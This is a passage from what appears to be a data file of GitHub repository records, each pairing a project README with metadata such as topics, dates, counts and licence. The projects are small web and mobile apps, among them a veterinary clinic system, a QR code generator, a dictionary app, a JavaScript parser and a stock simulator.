src="https://github.com/faraz412/cozy-passenger-4798/blob/main/Frontend/Files/cors.png?raw=true" alt="cors" width="70" height="50"/> <img src="https://github.com/faraz412/cozy-passenger-4798/blob/main/Frontend/Files/download.png?raw=true" alt="dotenv" width="60" height="50"/> <img src="https://github.com/faraz412/cozy-passenger-4798/blob/main/Frontend/Files/JWT.png?raw=true" alt="jwt" width="70" height="50"/> <img src="https://4008838.fs1.hubspotusercontent-na1.net/hubfs/4008838/mogoose-logo.png" alt="mongoose.png" width="70" height="70"/> <img src="https://i0.wp.com/community.nodemailer.com/wp-content/uploads/2015/10/n2-2.png?fit=422%2C360&ssl=1" alt="nodemailer" width="50" height="70"/> <img src="https://user-images.githubusercontent.com/13700/35731649-652807e8-080e-11e8-88fd-1b2f6d553b2d.png" alt="nodemon.png" width="50" height="50"/> <img src="https://user-images.githubusercontent.com/25181517/182884894-d3fa6ee0-f2b4-4960-9961-64740f533f2a.png" alt="redis" width="50" height="50"/> </p> ## API Endpoints #### Swagger-UI ``` GET /api-docs ``` #### Welcome ```javascript GET / ``` #### Registration ```javascript POST /user/register ``` #### Signin ```javascript POST /user/login POST /user/logout ``` #### User ```javascript GET /user/ GET /user/all GET /user/:id POST /user/register PATCH /user/update/:id DELETE /user/delete/:id ``` #### Doctor ```javascript GET /doctor/getDocID POST /doctor/register DELETE /doctor/delete ``` #### Appointment ```javascript GET /appointment/get GET /appointment/getall POST /appointment/create PATCH /appointment/update/:id ``` <div align = "center"> | `Project Highlights` | | :------------------: | <div align = "center"> <h2>Landing Page</h2> <img width="956" alt="Landing_Page" src="https://github.com/Rubel011/unarmed-science-115/blob/main/frontend/assests/home2.jpg"> <br> <img width="956" alt="Landing_Page" src="https://github.com/Rubel011/unarmed-science-115/blob/main/frontend/assests/home3.jpg"> <h2>Doctor Dashboard</h2> <img width="960" alt="User_Dashboard" src="https://github.com/Rubel011/unarmed-science-115/blob/main/frontend/assests/Doctor.png"> <br> <br> <h2>Book Appointment Dashboard</h2> <img width="958" alt="Trainer_Dashboard" src="https://github.com/Rubel011/unarmed-science-115/blob/main/frontend/assests/bookappointment.png"> <br> <h2>Virtual Meet</h2> <img width="938" alt="Admin_Dashboard" src="https://github.com/Rubel011/unarmed-science-115/blob/main/frontend/assests/virtual.png"> <h2>Admin Dark-Mode</h2> <img width="960" alt="Class_Information" src="https://github.com/Rubel011/unarmed-science-115/blob/main/frontend/assests/admin-light.png"> <h2>Admin Light-Mode</h2> <img width="938" alt="Admin_Dashboard" src="https://github.com/Rubel011/unarmed-science-115/blob/main/frontend/assests/admin-dark.png"> <br> <br> <div/> <br> | `Demo` | | :----: | [FRONTEND](https://vetspot.vercel.app/) [BACKEND](https://troubled-pig-life-jacket.cyclic.app/) | `Authors` | | :-------: | [RAMANAND TIWARI](https://github.com/ramanand1101) [RUBEL FORIDI](https://github.com/rubel011) [ASHISH KUMAR PALAI](https://github.com/ashishkumarpalai) [PRITI TIWARI](https://github.com/prititi) [HARIOM](https://github.com/hariomfw21)
The Veterinary System Website is a comprehensive solution designed to streamline and optimize the operations of a veterinary clinic. It offers features such as patient management, appointment scheduling, billing and invoicing, inventory management, and reporting and analytics. Backend is deployed on AWS Link:- http://54.198.95.171:8080/
authentication,authorization,css,html,javascript,jwt-authentication,mongodb,nodejs,swagger-ui,expressjs
2023-05-02T13:33:53Z
2023-10-29T13:30:17Z
null
6
36
109
0
4
7
null
null
JavaScript
TheSonOfSocrates/EventRegistrationApp
main
# Event Registration System Application ## Description #### We assume that the following description is elicited from stakeholders (e.g., potential customers): - The Event Registration System shall provide the ability to add a person by specifying the person’s name. This feature should be available in both a Web browser and an Android application. - The Event Registration System shall provide the ability to add an event by specifying the event’s name, date, start time, and end time. This feature should be available in both a Web browser and an Android application. - The Event Registration System shall provide the ability to register a person to an event. This feature should be available in both a Web browser and an Android application. - The Event Registration System shall list all events in a Web browser. - The Event Registration System shall list all persons in a Web browser. - The Event Registration System shall list all events next to the person who is registered to it in a Web browser. #### The target Event Registration System consists of three main components: - :star2:Backend: It provides the core business functionality exposed as RESTful services by using the Java Spring Framework. In addition, it connects to a database to store business data. - :star2:Web Frontend: The web frontend is developed in Vue.js, a popular framework using HTML5 and JavaScript for reactive user interfaces. The web frontend is connected to the backend via HTTP calls using the Rest API. - :star2:Android Frontend: The same backend services will also be accessed using an Android frontend application. Similarly, the Android frontend issues HTTP calls to call the backend.
Built with Gradle & Travis CI | Backend with Java Spring/Spring Boot, RESTful API and Heroku(PostgreSQL) + Web Frontend in Vue.js and Bootstrap + Mobile Frontend with Android
javascript,android,backend,bootstrap,gradle,heroku,java,spring,vue,messaging
2023-05-08T10:37:38Z
2023-05-08T10:39:51Z
null
1
0
1
0
0
7
null
MIT
Java
X1-Il/Qr-code-generator
main
# Qr-code-generator ![Qr Code Generator](https://github.com/X1-Il/Qr-code-generator/assets/120943267/a847b650-ef3d-4383-81d9-55898aaae458) ![Qr Code Generator](https://github.com/X1-Il/Qr-code-generator/assets/120943267/8ac4a629-5c3b-4075-968a-9ab2226d7161) This app generates Qr Code based on the entered URL. It is also possible to customize and download the generated Qr Code. ## Table of contents - [Overview](#overview) - [About App](#about-app) - [Links](#links) - [My process](#my-process) - [Built with](#built-with) - [Continued development](#continued-development) - [Useful resources](#useful-resources) - [Getting Started](#getting-started) - [System Requirements](#system-requirements) - [Installation](#installation) - [Bugs](#bugs) - [Contributing](#contributing) - [License](#license) - [Author](#author) ## Overview ### About App This app generates Qr Code based on the url entered. Features: - Light / dark mode theme switcher - Qr Code 'X1-Il.netlify.app' default on loading - Dynamically generating the Qr Code as you type the URL - Dynamically update the color and background of the Qr Code based on the customization input entered by the user - Dynamically update the customized image of the Qr Code - Removes the custom image of the Qr Code - You can download the `.png` of the generated Qr Code ### Links - Repository URL: [github](https://github.com/X1-Il/Qr-code-generator) - Live Site URL: [live site](https://qr-code-generator-x1.netlify.app/) ## My process ### Built with - Semantic HTML5 markup - CSS custom properties - Grid & Flexbox - [React](https://reactjs.org/) - Js library - [QRCode.react](https://www.npmjs.com/package/qrcode.react) - Qr Code package - [React Color](https://casesandberg.github.io/react-color/) - Color Pickers package ### Continued development Future features: - Serverless database connection - Authentication with login - Save the Qr Code generated ### Useful resources - [QRCode.react](https://www.npmjs.com/package/qrcode.react) - [React Color](https://casesandberg.github.io/react-color/) ## Getting Started In order to view this project locally, you need to make sure you clone this repository and install it's dependencies. ### System Requirements - [git][https://git-scm.com/] 2.31.1 or greater - [node][https://nodejs.org/en/] 14.16.1 or greater - [npm][https://nodejs.org/en/] 8.7.0 or greater To check which versions you have installed you can run these commands: ``` git --version node --version npm --version ``` If requirements above are not installed in your computer, you'll need to install them. By clicking on them you can go to their website, which can lead you the way. ### Installation - Clone the repository ```sh git clone https://github.com/X1-Il/Qr-code-generator.git ``` - Navigate to repository folder ```sh cd Qr-code-generator ``` - Install npm packages ```sh npm install ``` - To run the app in the development mode run in the project directory: ```sh npm start ``` ### Bugs Please feel free to create an issue if you see a bug or something unexpected in the app. ### Contributing - Fork the Project - Create your Feature Branch (`git checkout -b feature/yourFeature`) - Commit your Changes (`git commit -m 'Brief explanation of feature`') - Push to the Branch (`git push origin feature/yourFeature`) - Open a Pull Request ## License [MIT license](https://github.com/X1-Il/Qr-code-generator/blob/master/LICENSE) ## Author ### X1-Il portfolio - [X1-Il](https://x1-il.netlify.app) Thanks by X1-Il
simple Qr-code-generator using react
javascript,qr-code,qrcode,qrcode-generator,react
2023-05-12T20:18:02Z
2023-05-12T23:29:50Z
null
1
0
13
0
3
7
null
MIT
JavaScript
ViktorSvertoka/goit-react-hw-01-components
main
# Критерії приймання - Створений репозиторій `goit-react-hw-01-components`. - Компоненти всіх завдань рендеряться на одній сторінці, всередині спільного контейнера – кореневого компонента `<App>`. - При здачі домашньої роботи є посилання на репозиторій з вихідним кодом проекту. - В шапці репозиторія є посилання на живу сторінку на `GitHub pages`. - Під час відвідування робочої сторінки (GitHub pages) завдання, в консолі відсутні помилки та попередження. - Для кожного компонента є окрема папка з файлом React-компонента і файлом стилів. - Для компонентів описані `propTypes`. - Все, що компонент очікує у вигляді пропсів, передається йому під час виклику. - Імена компонентів зрозумілі та описові. - JS-код чистий і зрозумілий, використовується `Prettier`. - Стилізація виконана `CSS-модулями` або `Styled Components`, тому класи в результуючому DOM відрізнятимуться від прикладів. - Достатньо базової стилізації застосунку, насамперед він повинен працювати, а вже потім бути гарним. Приділяй 20% часу на CSS і 80% на JS. # Профіль соціальної мережі Необхідно створити компонент `<Profile>`, за допомогою якого ми могли б відображати інформацію про користувача соціальної мережі. Дані про користувача лежать у файлі user.json. ![Прев'ю компонента Profile](./assets/preview-01.png) ## Опис компонента `<Profile>` Компонент повинен приймати кілька пропсів з інформацією про користувача: - `username` — ім'я користувача - `tag` — тег в соціальній мережі без `@` - `location` — місто і країна - `avatar` — посилання на зображення - `stats` — об'єкт з інформацією про активності Компонент повинен створювати DOM елемент наступної структури. ```html <div class="profile"> <div class="description"> <img src="https://cdn-icons-png.flaticon.com/512/1077/1077012.png" alt="User avatar" class="avatar" /> <p class="name">Petra Marica</p> <p class="tag">@pmarica</p> <p class="location">Salvador, Brasil</p> </div> <ul class="stats"> <li> <span class="label">Followers</span> <span class="quantity">1000</span> </li> <li> <span class="label">Views</span> <span class="quantity">2000</span> </li> <li> <span class="label">Likes</span> <span class="quantity">3000</span> </li> </ul> </div> ``` ## Приклад використання ```js import user from 'путь/к/user.json; <Profile username={user.username} tag={user.tag} location={user.location} avatar={user.avatar} stats={user.stats} /> ``` # Секція статистики Створити компонент `<Statistics>`, який би відображав статистику з переданих пропсів. Наприклад, завантаження у хмару за типом файлів, відвідування веб-сторінки користувачами різних країн, фінансові витрати тощо. Дані про статистику лежать у файлі data.json. ![Прев'ю компонента Statistics](./assets/preview-02.jpg) ## Опис компонента Компонент повинен приймати два пропи `title` і `stats`, в яких вказується заголовок та об'єкт статистики. - `title` – не обов'язковий, і якщо він не переданий, не повинна рендеритись розмітка заголовка `<h2>`. - `stats` – масив об'єктів, що містять інформацію про елемент статистики. Може мати довільну кількість елементів. - Колір фону елемента статистики в оформленні можна пропустити або створити функцію для генерації випадкового кольору. Компонент повинен створювати DOM елемент наступної структури. ```html <section class="statistics"> <h2 class="title">Upload stats</h2> <ul class="stat-list"> <li class="item"> <span class="label">.docx</span> <span class="percentage">4%</span> </li> <li class="item"> <span class="label">.mp3</span> <span class="percentage">14%</span> </li> <li class="item"> <span class="label">.pdf</span> <span class="percentage">41%</span> </li> <li class="item"> <span class="label">.mp4</span> <span class="percentage">12%</span> </li> </ul> </section> ``` ## Приклад використання ```js import data from '/путь/к/data.json'; <Statistics title="Upload stats" stats={data} />; <Statistics stats={data} />; ``` # Список друзів Необхідно створити компонент `<FriendList>`, за допомогою якого ми могли б відображати інформацію про друзів користувача. Інформація про друзів зберігається у файлі friends.json. ![Прев'ю компонента FriendList](./assets/preview-03.jpg) ## Опис компонента `<FriendList>` Компонент повинен приймати один проп `friends` – масив об'єктів друзів. Компонент повинен створювати DOM наступної структури. ```html <ul class="friend-list"> <!-- Довільна кіл-сть FriendListItem --> </ul> ``` ## Опис компонента `<FriendListItem>` Компонент повинен приймати кілька пропів: - `avatar` – посилання на аватар - `name` – ім'я друга - `isOnline` – буль, що сигналізує про стан друга: в мережі або ні. Залежно від пропа `isOnline`, повинен змінюватися колір фону `span.status`. Це можна зробити за допомогою різних CSS-класів або Styled Components. Компонент повинен створювати DOM наступної структури. ```html <li class="item"> <span class="status"></span> <img class="avatar" src="" alt="User avatar" width="48" /> <p class="name"></p> </li> ``` ## Приклад використання ```js import friends from 'путь/к/friends.json'; <FriendList friends={friends} />, ``` # Історія транзакцій Необхідно створити компонент історії транзакцій в особистому кабінеті інтернет-банку. ![Прев'ю компонента TransactionHistory](./assets/preview-04.jpg) Дані для списку доступні у форматі JSON у файлі transactions.json. Це масив об'єктів, кожен об'єкт описує одну транзакцію з наступними властивостями: - `id` — унікальний ідентифікатор транзакції - `type` — тип транзакції - `amount` - сума транзакції - `currency` - тип валюти ## Опис компонента `<TransactionHistory>` Необхідно створити компонент `<TransactionHistory>`, який приймає один проп `items` – масив об'єктів транзакцій з `transactions.json`. Компонент створює розмітку таблиці. Кожна транзакція – це рядок таблиці. У прикладі наведена розмітка двох транзакцій. ```html <table class="transaction-history"> <thead> <tr> <th>Type</th> <th>Amount</th> <th>Currency</th> </tr> </thead> <tbody> <tr> <td>Invoice</td> <td>125</td> <td>USD</td> </tr> <tr> <td>Withdrawal</td> <td>85</td> <td>USD</td> </tr> </tbody> </table> ``` ## Приклад використання ```js import transactions from 'путь/к/transactions.json'; <TransactionHistory items={transactions} />; ``` # React homework template Этот проект был создан при помощи [Create React App](https://github.com/facebook/create-react-app). Для знакомства и настройки дополнительных возможностей [обратись к документации](https://facebook.github.io/create-react-app/docs/getting-started). ## Создание репозитория по шаблону Используй этот репозиторий организации GoIT как шаблон для создания репозитория своего проекта. Для этого нажми на кнопку `«Use this template»` и выбери опцию `«Create a new repository»`, как показано на изображении. ![Creating repo from a template step 1](./assets/template-step-1.png) На следующем шаге откроется страница создания нового репозитория. Заполни поле его имени, убедись что репозиторий публичный, после чего нажми кнопку `«Create repository from template»`. ![Creating repo from a template step 2](./assets/template-step-2.png) После того как репозиторий будет создан, необходимо перейти в настройки созданного репозитория на вкладку `Settings` > `Actions` > `General` как показано на изображении. ![Settings GitHub Actions permissions step 1](./assets/gh-actions-perm-1.png) Проскролив страницу до самого конца, в секции `«Workflow permissions»` выбери опцию `«Read and write permissions»` и поставь галочку в чекбоксе. Это необходимо для автоматизации процесса деплоя проекта. ![Settings GitHub Actions permissions step 2](./assets/gh-actions-perm-2.png) Теперь у тебя есть личный репозиторий проекта, со структурой файлов и папок репозитория-шаблона. Далее работай с ним как с любым другим личным репозиторием, клонируй его себе на компьютер, пиши код, делай коммиты и отправляй их на GitHub. ## Подготовка к работе 1. Убедись что на компьютере установлена LTS-версия Node.js. [Скачай и установи](https://nodejs.org/en/) её если необходимо. 2. Установи базовые зависимости проекта командой `npm install`. 3. Запусти режим разработки, выполнив команду `npm start`. 4. Перейди в браузере по адресу [http://localhost:3000](http://localhost:3000). Эта страница будет автоматически перезагружаться после сохранения изменений в файлах проекта. ## Деплой Продакшн версия проекта будет автоматически проходить линтинг, собираться и деплоиться на GitHub Pages, в ветку `gh-pages`, каждый раз когда обновляется ветка `main`. Например, после прямого пуша или принятого пул-реквеста. Для этого необходимо в файле `package.json` отредактировать поле `homepage`, заменив `your_username` и `your_repo_name` на свои, и отправить изменения на GitHub. ```json "homepage": "https://your_username.github.io/your_repo_name/" ``` Далее необходимо зайти в настройки GitHub-репозитория (`Settings` > `Pages`) и выставить раздачу продакшн версии файлов из папки `/root` ветки `gh-pages`, если это небыло сделано автоматически. ![GitHub Pages settings](./assets/repo-settings.png) ### Статус деплоя Статус деплоя крайнего коммита отображается иконкой возле его идентификатора. - **Желтый цвет** - выполняется сборка и деплой проекта. - **Зеленый цвет** - деплой завершился успешно. - **Красный цвет** - во время линтинга, сборки или деплоя произошла ошибка. Более детальную информацию о статусе можно посмотреть кликнув по иконке, и в выпадающем окне перейти по ссылке `Details`. ![Deployment status](./assets/deploy-status.png) ### Живая страница Через какое-то время, обычно пару минут, живую страницу можно будет посмотреть по адресу указанному в отредактированном свойстве `homepage`. Например, вот ссылка на живую версию для этого репозитория [https://goitacademy.github.io/react-homework-template](https://goitacademy.github.io/react-homework-template). Если открывается пустая страница, убедись что во вкладке `Console` нет ошибок связанных с неправильными путями к CSS и JS файлам проекта (**404**). Скорее всего у тебя неправильное значение свойства `homepage` в файле `package.json`. ### Маршрутизация Если приложение использует библиотеку `react-router-dom` для маршрутизации, необходимо дополнительно настроить компонент `<BrowserRouter>`, передав в пропе `basename` точное название твоего репозитория. Слеш в начале строки обязателен. ```jsx <BrowserRouter basename="/your_repo_name"> <App /> </BrowserRouter> ``` ## Как это работает ![How it works](./assets/how-it-works.png) 1. После каждого пуша в ветку `main` GitHub-репозитория, запускается специальный скрипт (GitHub Action) из файла `.github/workflows/deploy.yml`. 2. Все файлы репозитория копируются на сервер, где проект инициализируется и проходит линтинг и сборку перед деплоем. 3. Если все шаги прошли успешно, собранная продакшн версия файлов проекта отправляется в ветку `gh-pages`. В противном случае, в логе выполнения скрипта будет указано в чем проблема.
Home task for React course📘
goit,goit-react-hw-01-components,html5,javascript,jsx-syntax,react
2023-05-14T20:19:11Z
2023-05-21T20:38:58Z
null
1
0
21
0
0
7
null
null
JavaScript
kwickramasekara/photo-grid
main
# Photo Grid ![Dynamic JSON Badge](https://img.shields.io/badge/dynamic/json?url=https%3A%2F%2Fraw.githubusercontent.com%2Fkwickramasekara%2Fphoto-grid%2Fmain%2Fpackage.json&query=%24.version&label=version&color=D686D6) [![License: MIT](https://img.shields.io/badge/license-MIT-4DB6E6.svg)](https://opensource.org/licenses/MIT) [![Netlify Status](https://api.netlify.com/api/v1/badges/67078bff-cbbe-4a51-a7e0-ed9929141b04/deploy-status)](https://app.netlify.com/sites/photo-grid-demo/deploys) Javascript based self host-able photography portfolio coupled with [Sanity](https://www.sanity.io) headless CMS for asset management. ![Product image](https://ucarecdn.com/b4135495-fcd3-45b0-bd46-34d54b8f798d/-/preview/1500x771/-/format/auto/) ## Features A full list of features is available in the [wiki](https://github.com/kwickramasekara/photo-grid/wiki/Features) section. ## Documentation For detailed documentation, please see the [wiki](https://github.com/kwickramasekara/photo-grid/wiki) which contains a [getting started](https://github.com/kwickramasekara/photo-grid/wiki/Getting-Started) guide as well as other useful information. ## Examples See our [demo](https://photo-grid-demo.netlify.app/) site and [examples](https://github.com/kwickramasekara/photo-grid/discussions/categories/show-and-tell) from the community. ## Support If you need any help or have general questions, please post them in our [discussions](https://github.com/kwickramasekara/photo-grid/discussions) page and we'd be happy to help!.
Self host-able photography portfolio.
11ty,sanity,static-site,javascript
2023-05-12T03:27:39Z
2024-04-14T18:09:09Z
null
1
43
54
2
0
7
null
MIT
Nunjucks
SudiptaChakraborty51/glamour-ecommerce
master
# Glamour An Ecommerce website for beauty products ## **How to install and run locally ?** ``` $ git clone https://github.com/SudiptaChakraborty51/glamour-ecommerce.git $ cd glamour $ npm install $ npm start ``` ## **Technologies used :** - React JS - React Context API + useReducer - React Router - mockbee server - Vanilla CSS with flex, grid and media query - Razorpay payment Gateway - Toastify ## **Features :** - Home Page - Product Listing Page - Single Product Page - Search products - Filters and sort by - Price - Category - Brand - Ratings - Wishlist Management - Cart Management - Address Management - Checkout page - Coupons accounding to order - Payment gateway Integration - Order Management - Loading and Alerts - Authentication - Sign-up - Login - Logout - Error Page - Responsive UI ## **Demo :** https://github.com/SudiptaChakraborty51/glamour-ecommerce/assets/76644901/8195b7bd-1115-4043-be77-1660f5df2c90
Glamour is an e-commerce app for various beauty products. It has features like cart management, wishlist management, payment integration, exclusive offers and primary features that are required in an e-commerce app.
css,ecommerce,javascript,react,mockbee
2023-05-15T06:51:47Z
2023-06-08T12:07:55Z
null
1
0
144
0
2
7
null
null
JavaScript
chaxus/ranlexer
main
# ranlexer Tiny JavaScript ast parser and generator --- <a href="https://github.com/chaxus/ranlexer/actions"><img src="https://img.shields.io/github/actions/workflow/status/chaxus/ranlexer/main.yml" alt="Build Status"></a> <a href="https://npmjs.com/package/ranlexer"><img src="https://img.shields.io/npm/v/ranlexer.svg" alt="npm-v"></a> <a href="https://npmjs.com/package/ranlexer"><img src="https://img.shields.io/npm/dt/ranlexer.svg" alt="npm-d"></a> <a href="https://bundlephobia.com/result?p=ranlexer"><img src="https://img.badgesize.io/https:/unpkg.com/ranlexer/dist/index.umd.js?label=brotli&compression=brotli" alt="brotli"></a> <a href="#alternative-installation-methods"><img src="https://img.shields.io/badge/module%20formats-umd%2C%20esm-green.svg" alt="module formats: umd, esm"></a> ## Install Using npm: ```console npm install ranlexer --save ``` ## Library Progress This library is still under active development. Most common code manipulation/generation use cases are implemented, but there's still a lot of work to do. Please open an issue if you find a feature missing, bug, or question that isn't in the issue. ## Usage ranlexer can export the following methods - **parse**: Parse the code into an ast - **walk**: Walk through the structure of the ast to perform custom operations - **generate**: Parse the ast into code - **build**: A lightweight build tool that supports treeshaking ### parse Parse the code into an ast: ```ts import { parse } from 'ranlexer'; const code = 'let a = 1;'; const ast = parse(code); ``` ### walk Walk through the structure of the ast to perform custom operations There are two options: - **ast**: ast structure node - **opts**: One object with two methods in it ```ts // Export the type of the ast node import type { Types } from 'ranlexer' const opts = { enter: (node: Types.Node) => { // Enter the processing of the node }, leave: (node: Types.Node) => { // Leave the node processing } walk(ast, opts) ``` ### generate Parse the ast into code: ```ts import { generate } from 'ranlexer'; const ast = { type: NodeType.Program, start: 0, end: 9, body: [ { type: NodeType.VariableDeclaration, start: 0, end: 9, declarations: [ { type: NodeType.VariableDeclarator, id: { type: NodeType.Identifier, name: 'a', start: 4, end: 5, }, start: 4, end: 9, init: { type: NodeType.Literal, value: '1', raw: '1', start: 8, end: 9, }, }, ], kind: 'let', }, ], }; const code = generate(ast); // 'let a = 1;' ``` ### build A lightweight build tool that supports treeshaking ```ts import { build } from 'ranlexer'; const bundle = await build(option); ``` Generate a bundle by passing in options,All options are well, optional: - **input**: Build entry, if not set, the default value is `./index.js` - **output**: Path to the build output file. If not set, the default value is `./dist/index.js` - **external**: String array,the modules in the array are not built The bundle has two methods: - **generate**: generate is to output the built code directly, ```ts import { build } from 'ranlexer'; const bundle = await build(option); const code = bundle.generate(); ``` - **write**: write is to output the file to a directory. ```ts import { build } from 'ranlexer'; const bundle = await build(option); bundle.write(); ``` ## Visitors ![](http://profile-counter.glitch.me/chaxus-ranlexer/count.svg) ## Meta [LICENSE (MIT)](/LICENSE)
Tiny JavaScript parser and generator.
ast,javascript,parser,build,ranlexer
2023-04-25T14:34:32Z
2024-05-12T07:44:54Z
2023-05-07T03:02:14Z
1
31
75
0
0
7
null
MIT
TypeScript
matcharr/frontendExpert-interview-practice
main
# FrontendExpert-Interview-Practice This repository contains my solutions to a collection of frontend interview questions and exercises to help me prepare for my next job interview. ## About the questions The frontend interview questions in this repository are from the [Frontend Expert website](https://www.algoexpert.io/content#frontendexpert). These questions are designed to test your knowledge of frontend development concepts and practices, and can be useful for preparing for job interviews or improving your skills. ## Categories This repository contains solutions to frontend interview questions organized by the following categories: * **HTML:** This directory contains solutions to HTML questions. * **CSS:** This directory contains solutions to CSS questions. * **JavaScript:** This directory contains solutions to JavaScript questions. * **DOM Manipulation:** This directory contains solutions to DOM manipulation questions. * **React Components:** This directory contains solutions to React component questions. * **React Hooks:** This directory contains solutions to React hooks questions. ## Examples Here are a few examples of the solutions in this repository: * **HTML:** This directory contains solutions to HTML questions, such as creating forms and tables. * **CSS:** This directory contains solutions to CSS questions, such as centering elements and using flexbox. * **JavaScript:** This directory contains solutions to JavaScript questions, such as working with arrays and objects. * **DOM Manipulation:** This directory contains solutions to DOM manipulation questions, such as creating event listeners and manipulating the DOM. * **React Components:** This directory contains solutions to React component questions, such as creating class components and functional components. * **React Hooks:** This directory contains solutions to React hooks questions, such as using the useState and useEffect hooks. ## Contributing If you have a solution to a frontend interview question that you would like to contribute to this repository, feel free to open a pull request. All contributions are welcome! ## License This repository is licensed under the [MIT License](https://opensource.org/licenses/MIT).
This repository contains my solutions to a collection of frontend interview questions and exercises to help me prepare for my next job interview.
css3,dom-manipulation,html5,javascript,react-components,react-hooks,frontend,interview-questions
2023-04-25T10:47:58Z
2023-04-28T15:31:52Z
null
1
0
23
0
5
7
null
MIT
JavaScript
Haris-Mohanty/ImageCloud
master
null
ImageCloud is an online platform that provides users with a secure and reliable way to store and manage their digital images.
bootstrap5,javascript,jquery,php
2023-05-13T04:00:34Z
2023-06-07T05:48:15Z
null
1
0
178
0
0
7
null
MIT
PHP
nigel-daniels/openai
main
# Chat GPT Prompt Engineering Test code for ChatGPT prompt engineering course. This is based on the DeepLearning.AI, ChatGPT [Prompt Engineering for Developers](https://learn.deeplearning.ai/chatgpt-prompt-eng/lesson/1/introduction) course. In this repository I have converted all of the examples from Python to JavaScript. ## Set Up ### API Key If you want to try these out you will first need to setup your own ChatGPT secret key in your local environment. [Here](https://chatgpt.en.obiscr.com/blog/posts/2023/How-to-get-api-key/) is how you get a key. Once you have this put it in a local (server side) environment variable. For example in Mac OS, assuming you are using `zsh`, append the following to the file `.zshenv` in you own home directory: ``` export OPENAI_API_KEY='your_secret_key_value' ``` When you restart the shell or your machine the environment value `OPENAI_API_KEY` will be available to the `helper.js`. ### Node and JS Before trying any of the exercises don't for get to run `npm install` in the `./openai` directory to install the Node modules needed. In the root directory you will see the `helper.js`, all of the exercises use this to make their calls to the ChatGPT API. In each subdirectory you will find a `*.js` file and, sometimes, some supporting text files. Each JS file contains multiple prompts. Generally there are a couple of lines near the end of the file, such as: ``` let completion = await getCompletion(prompt8); console.log(completion); ``` In most cases you can just change the prompt passed to the `getCompletion()` function to try different exercises out. In some cases you will see code block commented out using the `\* ... *\` comment markers. In these cases the commented code blocks will have their own calls to `getCompletion()`, often in a loop of some kind. If you uncomment these blocks then be sure to comment out the last to calls above while you run that exercise.
Test code for ChatGPT prompt engineering course (in JS).
gpt-3,javascript,prompt-engineering
2023-05-08T19:41:49Z
2023-05-11T21:48:05Z
null
2
0
11
0
0
7
null
null
JavaScript
codeAbinash/english-dictionary-rn
main
# Word Sense : English Dictionary ![Release Date](https://img.shields.io/github/release-date/codeabinash/localdb.js?color=limegreen) ![Languages](https://img.shields.io/github/languages/top/codeabinash/english-dictionary-rn?color=yellow) ![Tag](https://img.shields.io/github/tag/codeabinash/english-dictionary-rn?color=limegreen) ![Release Version](https://img.shields.io/github/v/release/codeabinash/english-dictionary-rn?color=limegreen) ```com.englishdictionary.rn``` ![English Dictionary](https://codeAbinash.github.io/english-dictionary-rn/app_info/feature_graphic.png) ## Download Download the latest version of English Dictionary [here](https://github.com/codeAbinash/english-dictionary-rn/releases/latest). ### Word Sense : Comprehensive, user-friendly app. Lookup definitions, synonyms, antonyms, pronunciations & examples. Perfect for students & professionals. Word Sense is a powerful and user-friendly mobile application that allows users to easily search for the definitions and meanings of English words. With a comprehensive database of words and their definitions, this app is the perfect tool for students, professionals, or anyone who wants to improve their English language skills. One of the standout features of Word Sense is the "Word of the Day" feature. Every day, users are presented with a new word along with its definition, pronunciation guide, and example of usage. This feature is a great way for users to expand their vocabulary and learn new words. Another useful feature of Word Sense is the "Trending Words" section. This section shows users the most searched-for words, allowing them to stay up-to-date with the latest trends in the English language. This feature is particularly useful for students and professionals who need to stay informed about the language. Word Sense also allows users to create a personalized list of favorite words. This feature is perfect for users who want to keep track of words they have looked up and would like to reference in the future. The app also provides synonyms, antonyms, and usage examples for each word searched. This is particularly helpful for users who are learning the English language and need to understand the context in which words are used. In addition, the app offers a pronunciation guide for each word, making it easy for users to learn how to say words correctly. Overall, Word Sense is a comprehensive and versatile mobile application that offers users a wide range of features and tools to improve their English language skills. With its user-friendly interface and extensive database of words and definitions, it is the perfect tool for anyone who wants to expand their vocabulary and become more fluent in the English language. ## Download The App <a href='https://play.google.com/store/apps/details?id=com.englishdictionary.rn'> <img width="200px" alt='Get it on Google Play' src='https://play.google.com/intl/en_us/badges/static/images/badges/en_badge_web_generic.png'/> </a>
Comprehensive, user-friendly app. Lookup definitions, synonyms, antonyms, pronunciations & examples. Perfect for students & professionals.
android,android-app,android-application,english-dictionary,english-language,english-learning,javascript,react-native,typescript
2023-04-23T08:24:56Z
2023-05-23T10:48:19Z
2023-05-23T10:48:19Z
1
1
14
0
0
7
null
MIT
TypeScript
abhineetraj1/stock-simulator
main
# Stock simulation https://github.com/abhineetraj1/stock-simulator/assets/82033840/732c1d85-7b82-42b8-997d-9fba6d3085b7 This projects provide stock simuulation platform, where user gets some credits and user can use their credits to invested in virtuals share simulation. Sample account for testing:- * Username= abhineetraj1 * Password= abhineetraj ## Features * Account sign in, sign up and deletion * Stock chart * Keypress functions * Live data saving , where the info is stored immediately after exec. * Changing, username and password ## Installation * Download python3.10 * Install flask python library ``` pip3 install flask ``` ## Execution * Download the source code. * Extract the file and open terminal in that folder * Open terminal and run these code ``` flask run ``` * Open your default browser and open localhost:5000 url in that browser ## Languages and tools used: <p align="left"> <a href="https://getbootstrap.com" target="_blank" rel="noreferrer"> <img src="https://raw.githubusercontent.com/devicons/devicon/master/icons/bootstrap/bootstrap-plain-wordmark.svg" alt="bootstrap" width="40" height="40"/> </a> <a href="https://www.w3schools.com/css/" target="_blank" rel="noreferrer"> <img src="https://raw.githubusercontent.com/devicons/devicon/master/icons/css3/css3-original-wordmark.svg" alt="css3" width="40" height="40"/> </a> <a href="https://flask.palletsprojects.com/" target="_blank" rel="noreferrer"> <img src="https://www.vectorlogo.zone/logos/pocoo_flask/pocoo_flask-icon.svg" alt="flask" width="40" height="40"/> </a> <a href="https://www.w3.org/html/" target="_blank" rel="noreferrer"> <img src="https://raw.githubusercontent.com/devicons/devicon/master/icons/html5/html5-original-wordmark.svg" alt="html5" width="40" height="40"/> </a> <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript" target="_blank" rel="noreferrer"> <img src="https://raw.githubusercontent.com/devicons/devicon/master/icons/javascript/javascript-original.svg" alt="javascript" width="40" height="40"/> </a> <a href="https://www.python.org" target="_blank" rel="noreferrer"> <img src="https://raw.githubusercontent.com/devicons/devicon/master/icons/python/python-original.svg" alt="python" width="40" height="40"/> </a> </p> ## Developed by * [abhineetraj1](http://github.com/abhineetraj1)
This is stock simulation platform which gives user real time stock trade experience.
flask,javascript,javascript-game,python,stock,stock-market
2023-05-04T03:38:25Z
2024-03-21T04:43:12Z
null
1
0
6
0
0
7
null
MIT
CSS
momo-87/awesome-books-with-ES6
main
